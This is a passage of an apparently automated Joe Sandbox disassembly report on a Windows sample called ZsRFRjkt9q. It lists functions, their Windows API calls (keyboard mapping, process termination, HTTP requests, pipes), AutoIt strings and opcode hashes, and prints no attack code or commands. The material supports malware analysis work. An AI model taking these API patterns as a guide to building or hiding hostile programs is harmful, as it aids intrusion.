Instruction ID: 025b24fe7e4f8abf5356171388abe4f94745ccd014160fbad4c12bc25ea85440
Opcode Fuzzy Hash: fff7101387f9233e62c941087eac264b93e49a4ba47622118098bae08e948c6b
Instruction Fuzzy Hash: CEF06D3270D2321AE62476767C46B4B2A849F0173CBA106AFF864D51E2EF2DA941457D

Function 004027EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 0040281D
MapVirtualKeyW.USER32(00000010,00000000), ref: 00402825
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00402830
MapVirtualKeyW.USER32(000000A1,00000000), ref: 0040283B
MapVirtualKeyW.USER32(00000011,00000000), ref: 00402843
MapVirtualKeyW.USER32(00000012,00000000), ref: 0040284B

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: b22e764cd7a84692e8d62c301535e8d2360fde499381a97d8ddbadd5f993477e
Instruction ID: 6e9604c49f6eb5af476f9dbc967e5a635b3d3e71b3018c9c8894ab6170c87e60
Opcode Fuzzy Hash: b22e764cd7a84692e8d62c301535e8d2360fde499381a97d8ddbadd5f993477e
Instruction Fuzzy Hash: 0E016CB0902B5D7DE3008F6A8C85B56FFA8FF15354F00411B915C47941C7F5A864CBE5

Function 00449AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 1423608774-0
Opcode ID: 8364328d02ac5925869c5288c0cd67a6a41bd0c3f79fc2a0b1e62c94dca51390
Instruction ID: 63ce9322e8606113c6e1135c428cb5d5aac42c0829b34d22373603bb17140be1
Opcode Fuzzy Hash: 8364328d02ac5925869c5288c0cd67a6a41bd0c3f79fc2a0b1e62c94dca51390
Instruction Fuzzy Hash: BF018632642211ABEB152B54EC48DEF7779FF88711B04097EF503A21D0DB689C00EB58

Function 00447BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00447C07
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00447C1D
GetWindowThreadProcessId.USER32(?,?), ref: 00447C2C
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00447C3B
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00447C45
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00447C4C

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 5b79f91bb502725146a981fb66a016f92bc9497a9dab4b53fcde00210b90123e
Instruction ID: 35bf4f29df7024d855b68b72e8dbd477f97e9b3f99e0063559bf8e03715a9039
Opcode Fuzzy Hash: 5b79f91bb502725146a981fb66a016f92bc9497a9dab4b53fcde00210b90123e
Instruction Fuzzy Hash: FEF03072542158BBE72157529C0DEEF7B7CDFC6B21F00042DFA01E1091E7A05A41C7B9

Function 00449A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00449A33
RtlEnterCriticalSection.KERNEL32(?,?,?,?,00475DEE,?,?,?,?,?,0040ED63), ref: 00449A44
TerminateThread.KERNEL32(?,000001F6,?,?,?,00475DEE,?,?,?,?,?,0040ED63), ref: 00449A51
WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00475DEE,?,?,?,?,?,0040ED63), ref: 00449A5E

Part of subcall function 004493D1: CloseHandle.KERNEL32(?,?,00449A6B,?,?,?,00475DEE,?,?,?,?,?,0040ED63), ref: 004493DB

InterlockedExchange.KERNEL32(?,000001F6), ref: 00449A71
RtlLeaveCriticalSection.KERNEL32(?,?,?,?,00475DEE,?,?,?,?,?,0040ED63), ref: 00449A78

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 3f1e2c16216cecfdc73fce6ec1ef72f8582dbe07236a28daf3e2f1c983d17147
Instruction ID: 367759adab514061abb5dd86f6197ede6e78dda49913933573e170d0f774be30
Opcode Fuzzy Hash: 3f1e2c16216cecfdc73fce6ec1ef72f8582dbe07236a28daf3e2f1c983d17147
Instruction Fuzzy Hash: 0AF05432942211ABE7512B94EC4DDAF7739FF85311F14087AF503A10E0DB759C01DB54

Function 00401CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON

Download Yara Rule

APIs

Part of subcall function 0041F4EA: std::exception::exception.LIBCMT ref: 0041F51E
Part of subcall function 0041F4EA: __CxxThrowException@8.LIBCMT ref: 0041F533

__swprintf.LIBCMT ref: 00401EA6

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00401D49

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 2125237772-557222456
Opcode ID: 82b08c520612b8ab66ce3cd8f7d53ce300e52d5fa051bcf5f61124a63d2ca7e1
Instruction ID: 0cb507bf716021c280e44969461f5a3ac9c79fa0f2d4483edf5a8f66c4972dd5
Opcode Fuzzy Hash: 82b08c520612b8ab66ce3cd8f7d53ce300e52d5fa051bcf5f61124a63d2ca7e1
Instruction Fuzzy Hash: FD918B71104211AFC724EF25C895CAFB7A4AF85704F00492FF986A72E1DB79ED05CB9A

Function 0045AFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0045B006
CharUpperBuffW.USER32(?,?), ref: 0045B115
VariantClear.OLEAUT32(?), ref: 0045B298

Part of subcall function 00449DC5: VariantInit.OLEAUT32(00000000), ref: 00449E05
Part of subcall function 00449DC5: VariantCopy.OLEAUT32(?,?), ref: 00449E0E
Part of subcall function 00449DC5: VariantClear.OLEAUT32(?), ref: 00449E1A

Strings

AUTOIT.ERROR, xrefs: 0045B11B
Incorrect Parameter format, xrefs: 0045B03E, 0045B20B

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 84327044250f59a9cab6804b1ef7f11ab6ee9941cba0601633cc438829fb4262
Instruction ID: 52e6914b55ff8660d76304c2970caaf1dc2d4c1ce0d6a1091d09d6c503672bea
Opcode Fuzzy Hash: 84327044250f59a9cab6804b1ef7f11ab6ee9941cba0601633cc438829fb4262
Instruction Fuzzy Hash: 7C917B706083019FCB10DF25C48595BB7E4EF88705F04486EF89A9B3A2DB39E949CB96

Function 00445347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0041C6F4: _wcscpy.LIBCMT ref: 0041C717

_memset.LIBCMT ref: 00445438
GetMenuItemInfoW.USER32(?), ref: 00445467
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00445513
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0044553D

Strings

0, xrefs: 00445430

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 01a4ac22a369a3906532e4200640e2ca89e3b4e89d932765b1a56aece9e2e941
Instruction ID: 229c3148a9e1a9bfe78ef1b1e5e27531e8706f457ea565323bfac3cc7c02ae31
Opcode Fuzzy Hash: 01a4ac22a369a3906532e4200640e2ca89e3b4e89d932765b1a56aece9e2e941
Instruction Fuzzy Hash: 3B51E071604701ABEB159F28C841B7BB7E8AB86354F04062FF895D72D3DB78CD448B5A

Function 00440213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0044027B
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 004402B1
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 004402C2
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00440344

Strings

DllGetClassObject, xrefs: 004402B7

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 79973dfe286d0924063502fe85dda568f87302bef2bff90864adea8305253e84
Instruction ID: c3b2b385fa8966dad99c77db0206707ef9e6cc297604f621ef3166624dd72a76
Opcode Fuzzy Hash: 79973dfe286d0924063502fe85dda568f87302bef2bff90864adea8305253e84
Instruction Fuzzy Hash: 3B418F71600204EFEB05DF54C885B9E7BB9EF44314B1480AEEE099F246D7B8DD50CBA4

Function 00445007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00445075
GetMenuItemInfoW.USER32 ref: 00445091
DeleteMenu.USER32(00000004,00000007,00000000), ref: 004450D7
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,004C1708,00000000), ref: 00445120

Strings

0, xrefs: 0044506D

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: d5a45825af7f55f2a7d769438b1b400d94e08b700d4cff6d26567d240da928d4
Instruction ID: db465f5d1fa94ec0c75b63f3553bf801786c42f1ac7b6e4bf5c0d2fbc051ce62
Opcode Fuzzy Hash: d5a45825af7f55f2a7d769438b1b400d94e08b700d4cff6d26567d240da928d4
Instruction Fuzzy Hash: 4441B1306057419FEB10DF25D885B2BB7E4AF89728F044A2FF85597392D734E800CB6A

Function 00460567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?), ref: 00460587

Strings

none, xrefs: 00460662
winapi, xrefs: 004605F8
stdcall, xrefs: 00460609
cdecl, xrefs: 004605DE

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 2358735015-567219261
Opcode ID: 0e8fa9936e095e8789758d952d184e543a0e17c637bb92c0b3d6b3c3c7492529
Instruction ID: 5a99cc48baeaf98d2ac020c3fe827800d2685473d087967778722ea71df5eec6
Opcode Fuzzy Hash: 0e8fa9936e095e8789758d952d184e543a0e17c637bb92c0b3d6b3c3c7492529
Instruction Fuzzy Hash: 7B31A370500116ABCF00EF55CD419EFB3B4FF54318B10862FE826A76D2EB79A956CB98

Function 0043B80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0043B88E
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0043B8A1
SendMessageW.USER32(?,00000189,?,00000000), ref: 0043B8D1

Strings

ComboBox, xrefs: 0043B815
ListBox, xrefs: 0043B84D

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: fd2139567f8ab69302ba266fc19b701d19db26e173ca46828c3e37d05b5dba4b
Instruction ID: 75af9ec50760755e836abce323f7a54ddbaf44f5e0835d8c920f5867198b60a7
Opcode Fuzzy Hash: fd2139567f8ab69302ba266fc19b701d19db26e173ca46828c3e37d05b5dba4b
Instruction Fuzzy Hash: CD21D271A00108BEDB08AB65D886EFF7778DF49354F10422EF511A21E1DB7C590A97A8

Function 004051AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040522F
_wcscpy.LIBCMT ref: 00405283
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00405293
LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00473CB0

Strings

Line: , xrefs: 00473CD9

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memset_wcscpy
String ID: Line:
API String ID: 1053898822-1585850449
Opcode ID: 5a93062e463b5291ae8202b0ac4106f82042ada94cfdc4f28ea77096baa7610a
Instruction ID: af1427f6d41ff21884d985d4e629e724e95b45f0675a28509f4e8d353c660326
Opcode Fuzzy Hash: 5a93062e463b5291ae8202b0ac4106f82042ada94cfdc4f28ea77096baa7610a
Instruction Fuzzy Hash: 2D319E71508340AED361EB61EC46FEB77D8AF45304F00452FF585A61E2DB78A5488F9E

Function 004543E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00454401
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00454427
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00454457
InternetCloseHandle.WININET(00000000), ref: 0045449E

Part of subcall function 00455052: GetLastError.KERNEL32(?,?,004543CC,00000000,00000000,00000001), ref: 00455067

Strings

, xrefs: 00454450

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 1951874230-3916222277
Opcode ID: 2ae2f1a1a1f5d3ddde5fac4bd687caf801070e50ddb0d6f6e3599f60f704cce5
Instruction ID: 7aa06a6f42cffd20407d20dfa3cc54c699f161c4d28ccd99cc58e54c7684c86d
Opcode Fuzzy Hash: 2ae2f1a1a1f5d3ddde5fac4bd687caf801070e50ddb0d6f6e3599f60f704cce5
Instruction Fuzzy Hash: 9C21D0B1540208BFE7119F94CC80EBF77ECEB8975DF10842FF9059A281EA688D499779

Function 004690E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0041D1BA
Part of subcall function 0041D17C: GetStockObject.GDI32(00000011), ref: 0041D1CE
Part of subcall function 0041D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0041D1D8

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0046915C
LoadLibraryW.KERNEL32(?), ref: 00469163
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00469178
DestroyWindow.USER32(?), ref: 00469180

Strings

SysAnimate32, xrefs: 00469137

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: d7522572f52e7d85ebcabb9567955eca81081136ae215111d044ca7cb5f6ca0d
Instruction ID: 16967437a8ff6b7649d04cfe7d5b64226969d6153742429de35e53786cdd0d82
Opcode Fuzzy Hash: d7522572f52e7d85ebcabb9567955eca81081136ae215111d044ca7cb5f6ca0d
Instruction Fuzzy Hash: 7C218371600206BBFF104E649C44EFB37ADEF56364F20461AF95492290E7B5DC42A769

Function 00449568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00449588
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 004495B9
GetStdHandle.KERNEL32(0000000C), ref: 004495CB
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00449605

Strings

nul, xrefs: 00449600

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 1940121c75fedefb23b30f275eb602f4dfb1250f04432a587cdad5aad61bf5be
Instruction ID: 66b3d4fb4e9643f34041b919343489f51d7d56158e1018fa912c4bcc0f6ac78b
Opcode Fuzzy Hash: 1940121c75fedefb23b30f275eb602f4dfb1250f04432a587cdad5aad61bf5be
Instruction Fuzzy Hash: 48216B71600205ABFB219F25DC05A9FBBB8AF45724F204A2EF8A1D72D0D774DD41EB28

Function 00449634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00449653
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00449683
GetStdHandle.KERNEL32(000000F6), ref: 00449694
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 004496CE

Strings

nul, xrefs: 004496C9

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 9c66512d6f95fcdfbabbbcbe61e1abb9c78875304d1df792b0257b063aef83bf
Instruction ID: 90b4d87eb029effa5109f35d439d52d9dc698f60e9680a3d94063f085d7b045b
Opcode Fuzzy Hash: 9c66512d6f95fcdfbabbbcbe61e1abb9c78875304d1df792b0257b063aef83bf
Instruction Fuzzy Hash: 7721A1719002059BEB209F698C44E9FB7E8AF95734F200A1AF8A1D33D0D7749C41DB18

Function 0044DAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0044DB0A
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0044DB5E
__swprintf.LIBCMT ref: 0044DB77
SetErrorMode.KERNEL32(00000000,00000001,00000000,0049DC00), ref: 0044DBB5

Strings

%lu, xrefs: 0044DB71

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

